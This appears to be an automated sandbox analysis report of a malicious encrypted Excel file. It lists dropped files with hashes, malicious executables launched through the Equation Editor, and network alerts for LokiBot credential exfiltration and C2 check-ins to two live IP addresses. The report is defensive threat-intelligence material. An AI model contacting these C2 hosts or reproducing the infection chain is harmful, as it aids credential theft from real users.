                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:PNG image data, 139 x 180, 8-bit colormap, non-interlaced
                        Category:dropped
                        Size (bytes):2647
                        Entropy (8bit):7.8900124483490135
                        Encrypted:false
                        SSDEEP:48:H73wCcD5X+ajENpby1MTln0V1oPd8V8EAWG09tXIa1iBINm4YwFi9:H73KAajQPiMWJG08a1qINm4jU9
                        MD5:E46357D82EBC866EEBDA98FA8F94B385
                        SHA1:76C27D89AB2048AE7B56E401DCD1B0449B6DDF05
                        SHA-256:B77A19A2F45CBEE79DA939F995DBD54905DED5CB31E7DB6A6BE40A7F6882F966
                        SHA-512:8EC0060D1E4641243844E596031EB54EE642DA965078B5A3BC0B9E762E25D6DF6D1B05EACE092BA53B3965A29E3D34387A5A74EB3035D1A51E8F2025192468F3
                        Malicious:false
                        Preview:.PNG........IHDR.............../....EPLTE.......................o...ttu`aaLML.s;.../-,................~_)$....IDATx..].b.*....Y\.....o..4...bl.6.1...Y.".|.2A@y.../...X.X..X..2X.........o.Xz}go.*m..UT.DK...ukX.....t.%..iB......w.j.1].].m....._)T...Z./.%.tm..Eq...v...wNX@.I..'$CS:e.K.Un.U.v......*.P.j. .5.N.5,..B]....y..2!..^.?...5..A...>"....)...}.*.....{[e4(.Nn....x.,....t.1..6.....}K).$.I.%n$b..G.g.w.....M..w..B.......tF".YtI..C.s.~)..<@"......-..._.(x...b..C..........;5.=.......c...s.....>.E;g.#.hk.Q..g,o;Z`.$.p&.8..ia...La....~XD.4p...8......HuYw.~X.+&Q.a.H.C..ly..X..a.?O.yS,C.r..........Xbp&.D..1.....c.cp..G.....L.M..2..5...4..L.E..`.`9...@...A.....A.E;...YFN.A.G.8..>aI.I.,...K..t..].FZ...E..F....Do../.d.,..&.f.e!..6.......2.;..gNqH`...X..\...AS...@4...#.....!D}..A_....1.W..".S.A.HIC.I'V...2..~.O.A}N........@K.B./...J,.E.....[`I>.F....$v$...:,..H..K.om.E..S29kM/..z.W...hae..62z%}y..q..z...../M.X..)....B eC..........x.C.42u...W...7.7.7
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:PNG image data, 150 x 150, 8-bit/color RGBA, non-interlaced
                        Category:dropped
                        Size (bytes):5396
                        Entropy (8bit):7.915293088075047
                        Encrypted:false
                        SSDEEP:96:f8W/+DRQgDhhXoFGUAAX5QLwh9eDYfaiy3cHIOZ7NLXgGFMtu4vPWY1TIwD4i:f8agQgDhhXoFGUP2Lwh98YfaxcHIOPLo
                        MD5:590B1C3ECA38E4210C19A9BCBAF69F8D
                        SHA1:556C229F539D60F1FF434103EC1695C7554EB720
                        SHA-256:E26F068512948BCE56B02285018BB72F13EEA9659B3D98ACC8EEBB79C42A9969
                        SHA-512:481A24A32C9D9278A8D3C7DB86CAC30303F11C8E127C3BB004B9D5E6EDDF36830BF4146E35165DF9C0D0FB8C993679A067311D2BA3713C7E0C22B5470862B978
                        Malicious:false
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 160x160, frames 3
                        Category:dropped
                        Size (bytes):4396
                        Entropy (8bit):7.884233298494423
                        Encrypted:false
                        SSDEEP:96:1rQzp0lms5HqrrVflQ9MS5Bmy9CSKgpEfSgHk4oPQwb/BD+qSzAGW:1UF0EmEiSS3mKbbpDSk4oYwbBD+qKAX
                        MD5:22FEC44258BA0E3A910FC2A009CEE2AB
                        SHA1:BF6749433E0DBCDA3627C342549C8A8AB3BF51EB
                        SHA-256:5CD7EA78DE365089DDDF47770CDECF82E1A6195C648F0DB38D5DCAC26B5C4FA5
                        SHA-512:8ED1D2EE0C79AFAB19F47EC4DE880C93D5700DB621ACE07D82F32FA3DB37704F31BE2314A7A5B55E4913131BCA85736C9AC3CB5987BEE10F907376D76076E7CA
                        Malicious:false
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 160x160, frames 3
                        Category:dropped
                        Size (bytes):4396
                        Entropy (8bit):7.884233298494423
                        Encrypted:false
                        SSDEEP:96:1rQzp0lms5HqrrVflQ9MS5Bmy9CSKgpEfSgHk4oPQwb/BD+qSzAGW:1UF0EmEiSS3mKbbpDSk4oYwbBD+qKAX
                        MD5:22FEC44258BA0E3A910FC2A009CEE2AB
                        SHA1:BF6749433E0DBCDA3627C342549C8A8AB3BF51EB
                        SHA-256:5CD7EA78DE365089DDDF47770CDECF82E1A6195C648F0DB38D5DCAC26B5C4FA5
                        SHA-512:8ED1D2EE0C79AFAB19F47EC4DE880C93D5700DB621ACE07D82F32FA3DB37704F31BE2314A7A5B55E4913131BCA85736C9AC3CB5987BEE10F907376D76076E7CA
                        Malicious:false
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
                        Category:dropped
                        Size (bytes):11303
                        Entropy (8bit):7.909402464702408
                        Encrypted:false
                        SSDEEP:192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
                        MD5:9513E5EF8DDC8B0D9C23C4DFD4AEECA2
                        SHA1:E7FC283A9529AA61F612EC568F836295F943C8EC
                        SHA-256:88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
                        SHA-512:81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
                        Malicious:false
                        Process:C:\Users\Public\vbc.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):219608
                        Entropy (8bit):7.9897314726108535
                        Encrypted:false
                        SSDEEP:3072:HeVPHh1pYGP+TmX9fEv0W8Uc3pLmEavCycHI77blslGnM4Xryc7oxwdO8cRMJa3m:HeVfhf2uUSad7io3r2xGO8cRMYNrG+i
                        MD5:AC8E973D953305B03019CDB74006099C
                        SHA1:7976E0BE0FC69E238DAF16DB2BFF833340536C4E
                        SHA-256:2F62F941918151FCED3AD854B37DCDA1E40E91432D772781EBC2118E28987B41
                        SHA-512:3719354FA157A48C919AC13D1DA71DF1142D24448462355B83BD52FC3D3B8F8BF39E052FAFA3E9A961B3ED200FBBE8BD5C84716B9782392C75EFF34ADFFF38AB
                        Malicious:false
                        Process:C:\Users\Public\vbc.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):4858
                        Entropy (8bit):6.17383796672968
                        Encrypted:false
                        SSDEEP:96:nt0EwCLn8tWfofJ1QSZe8ozFieNdFhpQbxxszw8PX/9LOz8AQK:t5n8kUHQSwFieNdFhGbH8PXIz8AQK
                        MD5:CB3FBCC52C7B5805ACF1F81D65488D89
                        SHA1:EAD5B088DA9F7466D9E10537A449A2F8C7505E85
                        SHA-256:05FB79420AADA2C2199CABAD68F4D6483127D2D803A5FD4E755008E78A977931
                        SHA-512:9CFB8EA161797F5131AC4780CBEE9FB8E56FADEEEBEC7D39BFC96416F1949D5E0247FA0F7B1E71C415BC9A08CCE1AAFF4003BBA9221CFB7F77A629794F8933CD
                        Malicious:false
                        Process:C:\Users\Public\vbc.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):354872
                        Entropy (8bit):7.605710868367885
                        Encrypted:false
                        SSDEEP:6144:oIeVfhf2uUSad7io3r2xGO8cRMYNrG+ehVpsA7bejlOmKCS:OhfZ07isKRZrleV7/+4mKCS
                        MD5:EE5B2397743F917D9F93DF1631178B23
                        SHA1:2F039C1927989531F121F34D6BF43DEB5703405E
                        SHA-256:6B105FD88793034BDD4A7B6A45E7EC131C36C20D8FAABC4B4AEA557C905C73D5
                        SHA-512:82DB48AE41CC1A0069CDDC2B9A5E28E9197521C59EA580500C577F39B5B3D0D7F4D8EEF186204FB33C7A12D7627F949BEE98890CC9F07E91182740B860E37D85
                        Malicious:false
                        Process:C:\Users\Public\vbc.exe
                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                        Category:dropped
                        Size (bytes):125440
                        Entropy (8bit):6.382878598936808
                        Encrypted:false
                        SSDEEP:3072:8WbTBVpk7JTDA7SbfsejlOmaDjCsOPthVE:jhVpsA7bejlOmKCS
                        MD5:1EACD504E4461F9EE286715997D8A9EE
                        SHA1:64554FE410BB0B335373E99D2F8AA37800F30FDD
                        SHA-256:DE398BE02D5ABE9C8BCE84380AC5303EA00FC00820A50CAD007220F24538B3DE
                        SHA-512:A253CEC08A167F348D84677F6A992AE306F607C9AD9A10EF6AF03288E7D4A158A07056A50A0909E22B1A89B79386EA44C984754018A25817E22FF6167A6A6156
                        Malicious:true
                        Joe Sandbox View:
                        • Filename: RhACfIARBK.exe, Detection: malicious
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:data
                        Category:dropped
                        Size (bytes):512
                        Entropy (8bit):0.0
                        Encrypted:false
                        SSDEEP:3::
                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                        Malicious:false
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:CDFV2 Encrypted
                        Category:dropped
                        Size (bytes):191736
                        Entropy (8bit):7.958679742635318
                        Encrypted:false
                        SSDEEP:3072:W3x5yiKm7/AJj6GEOux8NBVuVnDcq3QT0PyYC9v1EFVW3NdR31od+xXfwsRYXn0D:uam7/AJ6GsWBVuV4MaB9voVWdT3iWPws
                        MD5:CF8B307CAA943326EE808BB3CB02DEEE
                        SHA1:705C25ADBDB7B805E47566540B3804EBA178E7DA
                        SHA-256:CBE84E2C523FD51DABB1365DF50415FFC51F8159C36798061742F08BA5D31B9B
                        SHA-512:CFC3AE790C2E17051A4B03214BAEFD44EB30E8601BF8AFD2D711CD197263854E96C19C2486A8838A1971607E09AD6728F6B9D8D982F6395B1FFC7D9C7EB599AA
                        Malicious:false
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:data
                        Category:dropped
                        Size (bytes):512
                        Entropy (8bit):0.0
                        Encrypted:false
                        SSDEEP:3::
                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                        Malicious:false
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:data
                        Category:dropped
                        Size (bytes):512
                        Entropy (8bit):0.0
                        Encrypted:false
                        SSDEEP:3::
                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                        Malicious:false
                        Process:C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                        Category:dropped
                        Size (bytes):125440
                        Entropy (8bit):6.382878598936808
                        Encrypted:false
                        SSDEEP:3072:8WbTBVpk7JTDA7SbfsejlOmaDjCsOPthVE:jhVpsA7bejlOmKCS
                        MD5:1EACD504E4461F9EE286715997D8A9EE
                        SHA1:64554FE410BB0B335373E99D2F8AA37800F30FDD
                        SHA-256:DE398BE02D5ABE9C8BCE84380AC5303EA00FC00820A50CAD007220F24538B3DE
                        SHA-512:A253CEC08A167F348D84677F6A992AE306F607C9AD9A10EF6AF03288E7D4A158A07056A50A0909E22B1A89B79386EA44C984754018A25817E22FF6167A6A6156
                        Malicious:false
                        Joe Sandbox View:
                        • Filename: RhACfIARBK.exe, Detection: malicious
                        Process:C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        File Type:very short file (no magic)
                        Category:dropped
                        Size (bytes):1
                        Entropy (8bit):0.0
                        Encrypted:false
                        SSDEEP:3:U:U
                        MD5:C4CA4238A0B923820DCC509A6F75849B
                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                        Malicious:false
                        Preview:1
                        Process:C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):46
                        Entropy (8bit):1.0424600748477153
                        Encrypted:false
                        SSDEEP:3:/lbWwWl:sZ
                        MD5:3B7B4F5326139F48EFA0AAE509E2FE58
                        SHA1:209A1CE7AF7FF28CCD52AE9C8A89DEE5F2C1D57A
                        SHA-256:D47B073BF489AB75A26EBF82ABA0DAB7A484F83F8200AB85EBD57BED472022FC
                        SHA-512:C99D99EA71E54629815099464A233E7617E4E118DD5B2A7A32CF41141CB9815DF47B0A40D1A9F89980C307596B53DD63F76DD52CF10EE21F47C635C5F68786B5
                        Malicious:false
                        Preview:........................................user.
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:data
                        Category:dropped
                        Size (bytes):165
                        Entropy (8bit):1.4377382811115937
                        Encrypted:false
                        SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                        MD5:797869BB881CFBCDAC2064F92B26E46F
                        SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                        SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                        SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                        Malicious:true
                        Preview:.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                        Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                        Category:dropped
                        Size (bytes):295124
                        Entropy (8bit):7.944502610174892
                        Encrypted:false
                        SSDEEP:6144:ow2pJekU4t1+9AJci0mJVmkzcOsggBk4u9aTTozAlJixJFfDqXR0e:eJekU4zuAJv0mupOtWu9aIcTR0e
                        MD5:7DF1896047D9647D818080DD17563D92
                        SHA1:A7C2BC04EC70C0F439E2A0863096FA7D391F79C5
                        SHA-256:9CBED5EFF56E1C08B6040C8AB4977E76528D59368D9D0550626B5380513ECB7B
                        SHA-512:1558B4573F82B4B6F34E96591A5A4CF4533C30BEC9D65C3BC1435FEB0119F23EB91E5C7E771D58F502199BB3CDE272C3135CD8A8F3944D87E8759D23A340D01D
                        Malicious:true
                        Antivirus:
                        • Antivirus: Joe Sandbox ML, Detection: 100%
                        File type:CDFV2 Encrypted
                        Entropy (8bit):7.958679742635318
                        TrID:
                        • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                        File name:_2201S_BUSAN_HOCHIMINH_.xlsx
                        File size:191736
                        MD5:cf8b307caa943326ee808bb3cb02deee
                        SHA1:705c25adbdb7b805e47566540b3804eba178e7da
                        SHA256:cbe84e2c523fd51dabb1365df50415ffc51f8159c36798061742f08ba5d31b9b
                        SHA512:cfc3ae790c2e17051a4b03214baefd44eb30e8601bf8afd2d711cd197263854e96c19c2486a8838a1971607e09ad6728f6b9d8d982f6395b1ffc7d9c7eb599aa
                        SSDEEP:3072:W3x5yiKm7/AJj6GEOux8NBVuVnDcq3QT0PyYC9v1EFVW3NdR31od+xXfwsRYXn0D:uam7/AJ6GsWBVuV4MaB9voVWdT3iWPws
                        Icon Hash:e4e2aa8aa4b4bcb4
                        Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                        02/10/22-10:21:59.753805 | TCP | 2024312 | ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 | 49166 | 80 | 192.168.2.22 | 172.67.197.66
                        02/10/22-10:21:59.753805 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49166 | 80 | 192.168.2.22 | 172.67.197.66
                        02/10/22-10:21:59.753805 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49166 | 80 | 192.168.2.22 | 172.67.197.66
                        02/10/22-10:21:59.753805 | TCP | 2024317 | ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 | 49166 | 80 | 192.168.2.22 | 172.67.197.66
                        02/10/22-10:22:02.840347 | TCP | 2024312 | ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 | 49167 | 80 | 192.168.2.22 | 172.67.197.66
                        02/10/22-10:22:02.840347 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49167 | 80 | 192.168.2.22 | 172.67.197.66
                        02/10/22-10:22:02.840347 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49167 | 80 | 192.168.2.22 | 172.67.197.66
                        02/10/22-10:22:02.840347 | TCP | 2024317 | ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 | 49167 | 80 | 192.168.2.22 | 172.67.197.66
                        02/10/22-10:22:03.831670 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49168 | 80 | 192.168.2.22 | 172.67.197.66
                        02/10/22-10:22:03.831670 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49168 | 80 | 192.168.2.22 | 172.67.197.66
                        02/10/22-10:22:03.831670 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49168 | 80 | 192.168.2.22 | 172.67.197.66
                        02/10/22-10:22:03.831670 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49168 | 80 | 192.168.2.22 | 172.67.197.66
                        02/10/22-10:22:04.920208 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49169 | 80 | 192.168.2.22 | 172.67.197.66
                        02/10/22-10:22:04.920208 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49169 | 80 | 192.168.2.22 | 172.67.197.66
                        02/10/22-10:22:04.920208 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49169 | 80 | 192.168.2.22 | 172.67.197.66
                        02/10/22-10:22:04.920208 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49169 | 80 | 192.168.2.22 | 172.67.197.66
                        02/10/22-10:22:05.958935 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49170 | 80 | 192.168.2.22 | 104.21.49.244
                        02/10/22-10:22:05.958935 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49170 | 80 | 192.168.2.22 | 104.21.49.244
                        02/10/22-10:22:05.958935 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49170 | 80 | 192.168.2.22 | 104.21.49.244
                        02/10/22-10:22:05.958935 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49170 | 80 | 192.168.2.22 | 104.21.49.244
                        02/10/22-10:22:07.006112 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49171 | 80 | 192.168.2.22 | 172.67.197.66
                        02/10/22-10:22:07.006112 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49171 | 80 | 192.168.2.22 | 172.67.197.66
                        02/10/22-10:22:07.006112 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49171 | 80 | 192.168.2.22 | 172.67.197.66
                        02/10/22-10:22:07.006112 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49171 | 80 | 192.168.2.22 | 172.67.197.66
                        02/10/22-10:22:08.131839 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49172 | 80 | 192.168.2.22 | 104.21.49.244
                        02/10/22-10:22:08.131839 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49172 | 80 | 192.168.2.22 | 104.21.49.244
                        02/10/22-10:22:08.131839 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49172 | 80 | 192.168.2.22 | 104.21.49.244
                        02/10/22-10:22:08.131839 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49172 | 80 | 192.168.2.22 | 104.21.49.244
                        02/10/22-10:22:09.274963 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49173 | 80 | 192.168.2.22 | 172.67.197.66
                        02/10/22-10:22:09.274963 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49173 | 80 | 192.168.2.22 | 172.67.197.66
                        02/10/22-10:22:09.274963 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49173 | 80 | 192.168.2.22 | 172.67.197.66
                        02/10/22-10:22:09.274963 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49173 | 80 | 192.168.2.22 | 172.67.197.66
                        02/10/22-10:22:10.415912 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49174 | 80 | 192.168.2.22 | 104.21.49.244
                        02/10/22-10:22:10.415912 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49174 | 80 | 192.168.2.22 | 104.21.49.244
                        02/10/22-10:22:10.415912 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49174 | 80 | 192.168.2.22 | 104.21.49.244
                        02/10/22-10:22:10.415912 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49174 | 80 | 192.168.2.22 | 104.21.49.244
                        02/10/22-10:22:11.483873 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49175 | 80 | 192.168.2.22 | 104.21.49.244
                        02/10/22-10:22:11.483873TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4917580192.168.2.22104.21.49.244
                        02/10/22-10:22:11.483873TCP2025381ET TROJAN LokiBot Checkin4917580192.168.2.22104.21.49.244
                        02/10/22-10:22:11.483873TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24917580192.168.2.22104.21.49.244
                        02/10/22-10:22:12.553926TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14917680192.168.2.22172.67.197.66
                        02/10/22-10:22:12.553926TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4917680192.168.2.22172.67.197.66
                        02/10/22-10:22:12.553926TCP2025381ET TROJAN LokiBot Checkin4917680192.168.2.22172.67.197.66
                        02/10/22-10:22:12.553926TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24917680192.168.2.22172.67.197.66
                        02/10/22-10:22:13.627098TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14917780192.168.2.22104.21.49.244
                        02/10/22-10:22:13.627098TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4917780192.168.2.22104.21.49.244
                        02/10/22-10:22:13.627098TCP2025381ET TROJAN LokiBot Checkin4917780192.168.2.22104.21.49.244
                        02/10/22-10:22:13.627098TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24917780192.168.2.22104.21.49.244
                        02/10/22-10:22:14.784465TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14917880192.168.2.22172.67.197.66
                        02/10/22-10:22:14.784465TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4917880192.168.2.22172.67.197.66
                        02/10/22-10:22:14.784465TCP2025381ET TROJAN LokiBot Checkin4917880192.168.2.22172.67.197.66
                        02/10/22-10:22:14.784465TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24917880192.168.2.22172.67.197.66
                        02/10/22-10:22:15.879811TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14917980192.168.2.22172.67.197.66
                        02/10/22-10:22:15.879811TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4917980192.168.2.22172.67.197.66
                        02/10/22-10:22:15.879811TCP2025381ET TROJAN LokiBot Checkin4917980192.168.2.22172.67.197.66
                        02/10/22-10:22:15.879811TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24917980192.168.2.22172.67.197.66
                        02/10/22-10:22:17.222000TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14918080192.168.2.22172.67.197.66
                        02/10/22-10:22:17.222000TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4918080192.168.2.22172.67.197.66
                        02/10/22-10:22:17.222000TCP2025381ET TROJAN LokiBot Checkin4918080192.168.2.22172.67.197.66
                        02/10/22-10:22:17.222000TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24918080192.168.2.22172.67.197.66
                        02/10/22-10:22:18.584775TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14918180192.168.2.22172.67.197.66
                        02/10/22-10:22:18.584775TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4918180192.168.2.22172.67.197.66
                        02/10/22-10:22:18.584775TCP2025381ET TROJAN LokiBot Checkin4918180192.168.2.22172.67.197.66
                        02/10/22-10:22:18.584775TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24918180192.168.2.22172.67.197.66
                        02/10/22-10:22:20.304833TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14918280192.168.2.22172.67.197.66
                        02/10/22-10:22:20.304833TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4918280192.168.2.22172.67.197.66
                        02/10/22-10:22:20.304833TCP2025381ET TROJAN LokiBot Checkin4918280192.168.2.22172.67.197.66
                        02/10/22-10:22:20.304833TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24918280192.168.2.22172.67.197.66
                        02/10/22-10:22:21.371169TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14918380192.168.2.22172.67.197.66
                        02/10/22-10:22:21.371169TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4918380192.168.2.22172.67.197.66
                        02/10/22-10:22:21.371169TCP2025381ET TROJAN LokiBot Checkin4918380192.168.2.22172.67.197.66
                        02/10/22-10:22:21.371169TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24918380192.168.2.22172.67.197.66
                        02/10/22-10:22:22.490195TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14918480192.168.2.22172.67.197.66
                        02/10/22-10:22:22.490195TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4918480192.168.2.22172.67.197.66
                        02/10/22-10:22:22.490195TCP2025381ET TROJAN LokiBot Checkin4918480192.168.2.22172.67.197.66
                        02/10/22-10:22:22.490195TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24918480192.168.2.22172.67.197.66
                        02/10/22-10:22:23.504559TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14918580192.168.2.22104.21.49.244
                        02/10/22-10:22:23.504559TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4918580192.168.2.22104.21.49.244
                        02/10/22-10:22:23.504559TCP2025381ET TROJAN LokiBot Checkin4918580192.168.2.22104.21.49.244
                        02/10/22-10:22:23.504559TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24918580192.168.2.22104.21.49.244
                        02/10/22-10:22:24.588293TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14918680192.168.2.22104.21.49.244
                        02/10/22-10:22:24.588293TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4918680192.168.2.22104.21.49.244
                        02/10/22-10:22:24.588293TCP2025381ET TROJAN LokiBot Checkin4918680192.168.2.22104.21.49.244
                        02/10/22-10:22:24.588293TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24918680192.168.2.22104.21.49.244
                        02/10/22-10:22:25.593017TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14918780192.168.2.22172.67.197.66
                        02/10/22-10:22:25.593017TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4918780192.168.2.22172.67.197.66
                        02/10/22-10:22:25.593017TCP2025381ET TROJAN LokiBot Checkin4918780192.168.2.22172.67.197.66
                        02/10/22-10:22:25.593017TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24918780192.168.2.22172.67.197.66
                        02/10/22-10:22:26.671475TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14918880192.168.2.22172.67.197.66
                        02/10/22-10:22:26.671475TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4918880192.168.2.22172.67.197.66
                        02/10/22-10:22:26.671475TCP2025381ET TROJAN LokiBot Checkin4918880192.168.2.22172.67.197.66
                        02/10/22-10:22:26.671475TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24918880192.168.2.22172.67.197.66
